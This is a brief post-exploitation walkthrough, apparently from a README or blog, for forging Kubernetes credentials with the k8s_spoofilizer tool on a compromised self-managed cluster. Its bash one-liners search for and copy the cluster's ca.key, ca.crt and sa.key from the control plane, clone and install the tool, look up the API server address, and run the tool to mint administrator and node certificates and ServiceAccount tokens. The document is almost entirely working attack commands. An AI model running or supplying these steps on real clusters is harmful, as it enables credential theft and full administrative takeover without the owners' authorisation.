Allows you to forge Kubernetes administrative user certificates, node certificates, and ServiceAccount tokens
The following is a few bash oneliners to operationalize k8s spoofilizer. Assumptions made in this are:
- You've compromised a non-cloud provider managed Kubernetes cluster
- You have access to (typically in /etc/kubernetes/pki/, In minikube it's /var/lib/minikube/certs):
- ca.crt: The public certificate of the cluster's Certificate Authority
- ca.key: Used to sign and issue new certificates within the Kubernetes cluster.
- sa.key: Private key used to sign Service Account tokens.
# Search for these files
# Run this on the control plane node
find / -name "ca.crt" ; find / -name "sa.key" ; find / -name "ca.key" # If everything is in /etc/kubernetes/pki...
# Move them to key_dir
mkdir key_dir ; cp /etc/kubernetes/pki/ca.crt /etc/kubernetes/pki/sa.key /etc/kubernetes/pki/ca.key key_dir/# Install pre-reqs
# Note you should probably use a virtual env for this...
sudo apt update && sudo apt install python3 python3-pip -y ; git clone https://github.com/jtesta/k8s_spoofilizer; pip install --user cryptography #--break-system-packages # Set APISERVER to the IP of the API server
APISERVER=$(kubectl get pods -A -o wide | grep kube-api | awk '{print $7}') && echo $APISERVER# Run k8s_spoofilizer.py
cd k8s_spoofilizer; ./k8s_spoofilizer.py --server https://$APISERVER:6443/ --update-uid-cache ../key_dir/